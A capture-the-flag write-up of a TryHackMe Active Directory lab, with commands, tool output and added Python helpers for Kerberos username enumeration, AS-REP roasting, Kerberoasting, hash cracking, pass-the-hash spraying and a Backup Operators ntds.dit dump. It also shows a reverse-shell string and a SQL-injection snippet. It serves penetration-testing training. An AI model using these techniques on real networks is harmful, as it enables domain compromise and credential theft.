CREATE & DESTROY

Razorback | TryHackMe

This room was really fun; I had to do a lot of reading and digging, so I got to learn a lot about Active Directory in the process.

53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-08-29 18:49:40Z)
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: raz0rblack.thm, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
2049/tcp open  mountd        1-3 (RPC #100005)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: raz0rblack.thm, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2022-08-29T18:50:36+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=HAVEN-DC.raz0rblack.thm
| Not valid before: 2022-08-28T18:48:06
|_Not valid after:  2023-02-27T18:48:06
| rdp-ntlm-info: 
|   Target_Name: RAZ0RBLACK
|   NetBIOS_Domain_Name: RAZ0RBLACK
|   NetBIOS_Computer_Name: HAVEN-DC
|   DNS_Domain_Name: raz0rblack.thm
|   DNS_Computer_Name: HAVEN-DC.raz0rblack.thm
|   Product_Version: 10.0.17763
|_  System_Time: 2022-08-29T18:50:27+00:00
Service Info: Host: HAVEN-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2022-08-29T18:50:29
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required

Initial nmap results. Lots to go at: NFS, Kerberos, LDAP, SMB and RDP on a box that identifies itself as the domain controller HAVEN-DC. We can see the DNS name (raz0rblack.thm), so the first thing to do is add it to /etc/hosts.

We’ll start with the open NFS share and see what’s there.

showmount -e raz0rblack.thm                
Export list for raz0rblack.thm:
/users (everyone)

sudo mkdir -p /mnt/users
sudo mount -t nfs raz0rblack.thm:/users /mnt/users

sudo ls -la /mnt/users
total 17
drwx------ 2 nobody nogroup   64 Feb 27  2021 .
drwxr-xr-x 3 root   root    4096 Aug 29 20:30 ..
-rwx------ 1 nobody nogroup 9861 Feb 25  2021 employee_status.xlsx
-rwx------ 1 nobody nogroup   80 Feb 25  2021 sbradley.txt

Interestingly you can’t cd into the folder as your own user (it is mode 700 and owned by nobody, so permission denied), but you can sudo cp the files out and read the copies.

sbradley.txt contains another flag, and employee_status.xlsx contains a list of usernames we can enumerate.

daven port			TF PLAYER						
imogen royce		CTF PLAYER						
tamara vidal		CTF PLAYER						
arthur edwards		CTF PLAYER						
carl ingram			TF PLAYER (INACTIVE)						
nolan cassidy		CTF PLAYER						
reza zaydan			TF PLAYER						
rico delgado		WEB SPECIALIST						
tyson williams		REVERSE ENGINEERING						
steven bradley		STEGO SPECIALIST						
chamber lin			TF PLAYER(INACTIVE)	

I’m sure their roles aren’t that useful, but their names are. A script from the CTF-Bash-Tools collection builds a list of likely username formats (first initial plus surname, first.last and so on) from those names, and kerbrute can then check each candidate against the KDC without triggering a logon failure, because a Kerberos pre-authentication request for a non-existent principal gets a distinct error from one for a real user.
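As an added example (my own code, not the CTF-Bash-Tools script the post used), here is the same step in Python. The employee list is typed in from the spreadsheet names shown above; the set of naming patterns is an assumption about what a domain might use, and kerbrute is what confirms which one is real.

```python
# Added example (mine, not the CTF-Bash-Tools script used in the post).
import re

# Constructed input: the name column of employee_status.xlsx as shown above.
EMPLOYEES = """
daven port
imogen royce
tamara vidal
arthur edwards
carl ingram
nolan cassidy
reza zaydan
rico delgado
tyson williams
steven bradley
chamber lin
"""


def candidates(first, last):
    """Common samAccountName conventions for one person, lower-cased.

    The pattern list is an assumption about naming schemes worth trying;
    kerbrute is what tells us which one this domain actually uses."""
    f, l = first.lower(), last.lower()
    forms = [
        f + l,           # stevenbradley
        f + "." + l,     # steven.bradley
        f[0] + l,        # sbradley   (the scheme this domain turned out to use)
        f[0] + "." + l,  # s.bradley
        f + l[0],        # stevenb
        l + f[0],        # bradleys
        l + "." + f,     # bradley.steven
        l + f,           # bradleysteven
        f,               # steven
        l,               # bradley
        f + "_" + l,     # steven_bradley
        f[0] + "_" + l,  # s_bradley
    ]
    return list(dict.fromkeys(forms))   # keep order, drop duplicates


def build_wordlist(text):
    """Turn 'first last' lines into a de-duplicated kerbrute wordlist."""
    out = []
    for line in text.splitlines():
        parts = re.split(r"\s+", line.strip())
        if len(parts) < 2:
            continue                      # blank line or mononym: nothing to permute
        out.extend(candidates(parts[0], parts[-1]))
    return list(dict.fromkeys(out))


if __name__ == "__main__":
    names = build_wordlist(EMPLOYEES)
    with open("formatted_name_wordlist.txt", "w") as fh:   # feed this to kerbrute userenum
        fh.write("\n".join(names) + "\n")
    print(f"{len(names)} candidates written")
```

Twelve patterns per name keeps the list small enough that kerbrute finishes in about a second, as it did in the post; the valid hits (sbradley, twilliams) all come from the first-initial-plus-surname form, which is worth remembering when guessing any accounts that are not in the spreadsheet.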

./kerbrute_linux_amd64 userenum -d raz0rblack.thm --dc raz0rblack.thm ~/Desktop/thm/raz0r/formatted_name_wordlist.txt

Kerbrute reports 3 valid usernames.

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 08/29/22 - Ronnie Flathers @ropnop

2022/08/29 21:24:01 >  Using KDC(s):
2022/08/29 21:24:01 >

2022/08/29 21:24:02 >  [+] VALID USERNAME:       lvetrova@raz0rblack.thm
2022/08/29 21:24:02 >  [+] VALID USERNAME:       twilliams@raz0rblack.thm
2022/08/29 21:24:02 >  [+] VALID USERNAME:       sbradley@raz0rblack.thm
2022/08/29 21:24:02 >  Done! Tested 154 usernames (3 valid) in 1.060 seconds

I spent some time attempting to spray passwords with little luck, so I returned to the impacket suite to see what’s on offer.

GetNPUsers.py performs AS-REP roasting. For any account with “Do not require Kerberos preauthentication” set (the UF_DONT_REQUIRE_PREAUTH flag), the KDC will answer an AS-REQ for that user with an AS-REP containing material encrypted under the user’s password hash, with no password needed to ask. That blob can be cracked offline.

python3 /opt/impacket/examples/GetNPUsers.py raz0rblack.thm/ -dc-ip raz0rblack.thm -usersfile users -format hashcat -outputfile ~/Desktop/thm/raz0r/hashes.txt

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] User sbradley doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lvetrova doesn't have UF_DONT_REQUIRE_PREAUTH set

Only twilliams had pre-authentication disabled, so the output file holds a single AS-REP hash. We’ll crack it with hashcat (mode 18200 is Kerberos 5 AS-REP etype 23).

hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt --force --show   

The password cracks almost instantly because it sits near the top of rockyou.txt, so I thought I’d try the same password against the other users in the list with crackmapexec. Interestingly, instead of a failed login message we get STATUS_PASSWORD_MUST_CHANGE for the user sbradley: the password is correct, but the account is flagged “user must change password at next logon”, so a normal SMB logon is refused until it is changed.

raz0rblack.thm\sbradley:roastpotatoes STATUS_PASSWORD_MUST_CHANGE

smbpasswd -r raz0rblack.thm -U sbradley
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user sbradley

smbpasswd -r talks to the remote machine over SMB and, given the old password, lets us set a new one ourselves. We set the new password to Password! because that’s super secure.

This user has read access to a folder called trash in the SMB share so lets grab all the files and have a look.

smb: \> ls
  .                                   D        0  Tue Mar 16 06:01:28 2021
  ..                                  D        0  Tue Mar 16 06:01:28 2021
  chat_log_20210222143423.txt         A     1340  Thu Feb 25 19:29:05 2021
  experiment_gone_wrong.zip           A 18927164  Tue Mar 16 06:02:20 2021
  sbradley.txt                        A       37  Sat Feb 27 19:24:21 2021

                5101823 blocks of size 4096. 1003387 blocks available
smb: \> mget *

The zip file will contain the answer to one of the questions, so using zip2john we dump the archive’s hash to a file and crack it with john.

john zip.hash -w=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
electromagnetismo (experiment_gone_wrong.zip)     
1g 0:00:00:01 DONE (2022-08-31 21:08) 0.9345g/s 7832Kp/s 7832Kc/s 7832KC/s elieus..elboty2009
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Opening the zip file gives a system.hive and NTDS.dit, which secretsdump turns into a huge file of hashes (it turns out to be an old copy of the directory, which is why most of the hashes no longer work). We’ve creds for 2 of the 3 verified usernames, so we can try every hash against the user lvetrova using crackmapexec again. Each secretsdump line is domain\user:RID:LM hash:NT hash:::, so we can use awk to pull out the 4th colon-delimited field (the NT hash) into a new file for CME to pass-the-hash with.

awk -F : '{print $4}' ntds.txt > ntdshashes.txt
crackmapexec smb -u lvetrova -H ntdshashes.txt            
SMB     445    HAVEN-DC         [*] Windows 10.0 Build 17763 x64 (name:HAVEN-DC) (domain:raz0rblack.thm) (signing:True) (SMBv1
SMB     445    HAVEN-DC         [-] raz0rblack.thm\lvetrova:1afedc472d0fdfe07cd075d36804efd0 STATUS_LOGON_FAILURE 
SMB     445    HAVEN-DC         [-] raz0rblack.thm\lvetrova:7b8b14a73d8a45249de2f5b0c225d515 STATUS_LOGON_FAILURE 
SMB     445    HAVEN-DC         [-] raz0rblack.thm\lvetrova:081af9630677a387f6f0a9bb17852602 STATUS_LOGON_FAILURE 
SMB     445    HAVEN-DC         [-] raz0rblack.thm\lvetrova:c184a72ed800899bc1ff633778a89b5e STATUS_LOGON_FAILURE 
SMB     445    HAVEN-DC         [+] raz0rblack.thm\lvetrova:f220d3988deb3f516c73f40ee16c431d
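The awk one-liner works, but it also hands crackmapexec the empty-password hash, machine accounts and duplicate hashes, each of which is a wasted logon attempt that still counts towards any lockout threshold. The following is an added example of my own, not from the post: it parses secretsdump-style lines into a de-duplicated spray list. The input lines, users and hashes are constructed for the example and are not from the target.

```python
# Added example (mine, not the post's awk one-liner).
import re

# Constructed sample in secretsdump.py's NTDS output format: domain\user:RID:LM:NT:::
# Users and hashes are made up for the example and are not from the target.
SAMPLE_NTDS = r"""
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
EXAMPLE.LOCAL\Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
EXAMPLE.LOCAL\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
EXAMPLE.LOCAL\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
EXAMPLE.LOCAL\HAVEN-DC$:1000:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
EXAMPLE.LOCAL\alice:1105:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
EXAMPLE.LOCAL\bob:1106:aad3b435b51404eeaad3b435b51404ee:ffeeddccbbaa99887766554433221100:::
[*] Kerberos keys grabbed
EXAMPLE.LOCAL\alice:aes128-cts-hmac-sha1-96:00112233445566778899aabbccddeeff
"""

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password
LINE_RE = re.compile(
    r"^(?:[^\\:]+\\)?([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::$", re.I)


def parse_ntds(text):
    """Yield (user, rid, nthash) for well-formed hash lines; banners and
    Kerberos-key lines are ignored."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m.group(1), int(m.group(2)), m.group(4).lower()


def spray_hashes(text, skip_machines=True, skip_empty=True):
    """De-duplicated NT hashes worth trying against one account.

    Machine accounts (name ends in $) and the empty-password hash are dropped
    by default: each is a guaranteed failure that still counts towards lockout."""
    seen = []
    for user, _rid, nt in parse_ntds(text):
        if skip_machines and user.endswith("$"):
            continue
        if skip_empty and nt == EMPTY_NT:
            continue
        if nt not in seen:
            seen.append(nt)
    return seen


if __name__ == "__main__":
    hashes = spray_hashes(SAMPLE_NTDS)
    with open("ntdshashes.txt", "w") as fh:   # then: crackmapexec smb <dc> -u lvetrova -H ntdshashes.txt
        fh.write("\n".join(hashes) + "\n")
    print(f"{len(hashes)} candidate hashes written")
```

Before spraying a list like this against a real domain, check the lockout policy first (net accounts /domain, or the Bloodhound domain node) and size the list accordingly.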

This user also has RDP access and crackmapexec tells us we can Evil-WinRM to the box.

The file lvetrova.xml says “Your Flag Is Here” but shows no flag. After a lot of googling I came across posts explaining the format: it is a PSCredential object serialised with PowerShell’s Export-Clixml. The password inside is a SecureString protected with DPAPI under the key of the user who exported it, so it can only be read back by Import-Clixml in that user’s context on that machine, which is exactly where our Evil-WinRM shell puts us. The credential is recovered with the following.

# First import the file as a variable to use.
$ss = Import-Clixml -Path lvetrova.xml
# Then output the decrypted credential in a formatted form
$ss.GetNetworkCredential() | Format-List
# Which gives us the following...
UserName       : Your Flag is here =>
Password       : THM{694362e877adef0d85a92e6d17551fe4}
SecurePassword : System.Security.SecureString
Domain         :

While crackmapexec was validating the hashes I also ran impacket’s GetUserSPNs.py (Kerberoasting: any user account with an SPN set will give up a TGS ticket encrypted with that account’s password hash). Cracking that ticket with hashcat (mode 13100) gives the username xyan1d3 and password cyanide9amine5628, which according to crackmapexec we can Evil-WinRM into as well. The next question pertains to this user, so let’s see where their flag is hidden.

This user has a similar XML file, which we can do exactly the same thing to obtain the flag.

Since we’re on an AD box, I’ll run Bloodhound and see if there’s any obvious mis-configurations to move laterally.

We can see that xyan1d3 is a member of backup operators which we can confirm in our Evil-WinRM shell.

*Evil-WinRM* PS C:\Users\xyan1d3\Documents> get-adgroupmember -identity "backup operators"

distinguishedName : CN=bash -i \>&. /dev/tcp/ 0\>&1,CN=Users,DC=raz0rblack,DC=thm
name              : bash -i >&. /dev/tcp/ 0>&1
objectClass       : user
objectGUID        : 89642a3b-44d6-47a8-abea-4b9135e45994
SamAccountName    : xyan1d3
SID               : S-1-5-21-3403444377-2687699443-13012745-1106

xyan1d3 doesn’t have access to the files in Administrator’s home folder, but Backup Operators hold SeBackupPrivilege, which lets a member read any file on the system for backup purposes regardless of its ACL. That is enough to grab ntds.dit and dump every domain hash. The catch is that on a live domain controller ntds.dit is held open by LSASS and cannot be copied directly, so we use diskshadow to take a volume shadow copy and read the file from the snapshot instead.

To do this, first create a script for diskshadow to run. Each line ends in a throwaway X: diskshadow drops the last character of every line when it reads a script file, and the echoed commands in the output below show the X gone. The create step is what actually takes the snapshot before it is exposed as E:.

set verbose onX
set metadata C:\Windows\Temp\meta.cabX
set context clientaccessibleX
set context persistentX
begin backupX
add volume C: alias cdriveX
createX
expose %cdrive% E:X
end backupX

Then pass the file to diskshadow.

diskshadow /s backup.txt                                                                                                
Microsoft DiskShadow version 1.0                                                                                                                  
Copyright (C) 2013 Microsoft Corporation                                                                                                          
On computer:  HAVEN-DC,  9/1/2022 2:04:45 AM                                                                                                      
-> set verbose on                                                                                                                                 
-> set metadata C:\Windows\Temp\meta.cab                                                                                                          
-> set context clientaccessible                                                                                                                   
-> set context persistent                                                                                                                         
-> begin backup                                                                                                                                   
-> add volume C: alias cdrive                                                                                                                     
-> create                                                                                                                                         
Excluding writer "Shadow Copy Optimization Writer", because all of its components have been excluded.                                             
Component "\BCD\BCD" from writer "ASR Writer" is excluded from backup,                                                                            
because it requires volume  which is not in the shadow copy set.          

Using robocopy in backup mode (/b), which is what actually exercises SeBackupPrivilege, we can clone ntds.dit out of the snapshot even though the folder’s ACL would normally refuse us.

C:\files> robocopy /b E:\Windows\ntds . ntds.dit                                                                                  
   ROBOCOPY     ::     Robust File Copy for Windows                                                                                               
  Started : Thursday, September 1, 2022 2:10:28 AM                                                                                                
   Source : E:\Windows\ntds\                                                                                                                      
     Dest : C:\files\                                                                                                                             
    Files : ntds.dit                                                                                                                              
  Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30                                                                                               
                           1    E:\Windows\ntds\                                                                                                  
            New File              16.0 m        ntds.dit       

Copying these (ntds.dit plus the SYSTEM hive, which secretsdump needs for the boot key that decrypts the dit) to our Kali box with smbserver and dumping with secretsdump gives us another hash file, this time with a more reasonable and up-to-date list of users. With Evil-WinRM we can pass the Administrator NT hash and log in as Administrator.


The root.xml file doesn’t import the way the others did and gives a cryptographic error: Import-Clixml expects a DPAPI blob and this value isn’t one. After diving down another rabbit hole, I realised on inspection of the XML that the SecureString value was just hex encoded (SecureString text is UTF-16LE, so a hex value with a 00 byte after every ASCII character is the giveaway), so we can quickly retrieve the flag…
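Added example, my own code rather than anything from the post, covering both the lvetrova.xml/xyan1d3 case above and root.xml: it pulls the SecureString values out of an Export-Clixml file and classifies how each was protected, so you know before wasting time whether it can be decoded offline or has to be read as the owning user on the owning host. The sample XML is constructed in Export-Clixml’s layout with a hex-encoded UTF-16LE value, as the post describes root.xml; the DPAPI and keyed-AES prefixes are the well-known markers those two ConvertFrom-SecureString formats start with.

```python
# Added example (mine, not from the post).
import xml.etree.ElementTree as ET

PS_NS = "{http://schemas.microsoft.com/powershell/2004/04}"
# Well-known prefixes of the two protected forms ConvertFrom-SecureString emits:
DPAPI_MARKER = "01000000d08c9ddf0115d1118c7a00c04fc297eb"  # CryptProtectData blob header
KEYED_MARKER = "76492d1116743f0423413b16050a5345"           # -Key / -SecureKey (AES) form


def sample_clixml(username, secret):
    """Constructed Export-Clixml output for a PSCredential whose SecureString is
    stored as hex of its UTF-16LE plaintext (no DPAPI), as the post found root.xml."""
    ss = secret.encode("utf-16-le").hex()
    return f"""<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0"><T>System.Management.Automation.PSCredential</T><T>System.Object</T></TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">{username}</S>
      <SS N="Password">{ss}</SS>
    </Props>
  </Obj>
</Objs>"""


def extract_secure_strings(xml_text):
    """Map property name -> raw <SS> value for every SecureString in the file."""
    root = ET.fromstring(xml_text)
    return {el.get("N"): (el.text or "").strip() for el in root.iter(PS_NS + "SS")}


def classify(ss_value):
    """How was this SecureString protected, and therefore where can it be read?"""
    v = ss_value.strip().lower()
    if v.startswith(DPAPI_MARKER):
        return "dpapi"    # bound to the exporting user's DPAPI key: Import-Clixml as that user, on that host
    if v.startswith(KEYED_MARKER):
        return "aes-key"  # ConvertFrom-SecureString -Key: need the key, wherever the author kept it
    return "hex"          # plain hex of the UTF-16LE text: decode anywhere


def decode_offline(ss_value):
    """Decode the unprotected form; None when a key or user context is required."""
    if classify(ss_value) != "hex":
        return None
    try:
        return bytes.fromhex(ss_value.strip()).decode("utf-16-le")
    except ValueError:    # not hex, or not valid UTF-16: some other serialisation
        return None


if __name__ == "__main__":
    doc = sample_clixml("Your Flag is here =>", "THM{constructed_example_not_the_real_flag}")
    for name, value in extract_secure_strings(doc).items():
        print(name, classify(value), decode_offline(value))
```

For a "dpapi" result the only sensible route is the one used for lvetrova.xml: get a shell as that user and call Import-Clixml there, or pull the user’s DPAPI master key and decrypt it with a DPAPI tool. Trying to decode it as hex, which is what the Administrator shell effectively did with root.xml in reverse, is the source of the cryptographic error.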

Look this is your cookie.
FunFact : This cookie can change its own flavour automatically. To test it just think of your favourite flavour.

And stop putting 'OR '1'='1 inside login.php

Enjoy your Cookie

Inside the cookie.json there’s a base64 encoded text of the above, so after a bunch of digging we find the folder “Top Secret” inside “C:\Program Files” containing the following PNG.

This gives us the answer to the last question. The way to save and exit vim. :wq
